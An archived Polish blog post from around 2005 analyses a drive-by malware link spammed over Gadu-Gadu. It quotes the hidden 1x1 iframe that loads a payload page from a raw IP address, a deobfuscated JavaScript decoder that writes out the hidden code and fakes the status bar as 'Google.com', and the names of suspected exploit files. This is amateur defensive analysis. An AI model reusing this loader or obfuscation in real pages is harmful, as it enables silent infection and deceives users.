Uwaga wirus

Ten wpis jest częścią mojego starego bloga, prowadzonego w latach 2005-2007 pod adresem dragonee.jogger.pl. Został on zachowany w celach archiwizacyjnych i niekoniecznie reprezentuje moje bieżące stanowisko na dany temat.

No tak… doszło do tego, że siedzę w niedzielę i bawię się w rozgrzebywanie kodu wirusów.

Jeden z moich znajomych powiedział mi, że ten link prowadzi do wirusa, a pewna osoba podająca się jako Marta spamuje nim poprzez gadu (numer 9523477, możliwe też, że 9512753 i 7778035, chociaż mnie nie wysłano linka). Nie miałem nic do roboty, wiec zacząłem sprawdzać jak to działa.

Sama strona nie korzysta z jakiegoś bardzo oryginalnego sposobu – używa <iframe>.

Kod ładujący kolejną stronę:
<iframe src="http://85.255.113.4/dl/adv435.php" width=1 height=1>

Po wejściu na następną stronę w dole przeglądarki (Firefox) pokazuje się informacja o ładowaniu apletu. Zaglądając w źródło możemy dostrzec długaśny ciąg tekstowy zaszyfrowany w dość prosty sposób. Otóż znajduje się tam deklaracja funkcji przepuszczona poprzez escape() i faktyczny kod ramki zaszyfrowany przez tą funkcję.

Po krótkiej zabawie udało mi się rozkodować funkcję:
function dF(s)
{
	var s1 = unescape(s.substr(0, s.length - 1));
	var t='';
	for(i=0; i<s1.length; i++)	{
		t += String.fromCharCode(s1.charCodeAt(i) - s.substr(s.length - 1,1));
	}
	document.write(unescape(t));
	self.focus();
	setInterval("window.status='Google.com'",7);
}

Wystarczyło teraz zmienić < na &lt; aby wyświetlić kod strony w przeglądarce.

Wydaje mi się, że w tym miejscu znajduje się pięć potencjalnych zagrożeń – kursor o nazwie sploit.anr, obiekt x2, obiekt x3, aplet loaderadv435.jar oraz obiekt x.chm. Nie jestem jednak MVP i nie znam się aż tak głęboko na dziurach w Windows. Dlatego skończę w tym miejscu. Jeśli czegoś się dowiem, to dopiszę.

Tags:,
4 komentarze
  1. Wrzesień 25, 2005
  2. Wrzesień 25, 2005
  3. Wrzesień 25, 2005
  4. Czerwiec 21, 2007

Leave a Reply

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *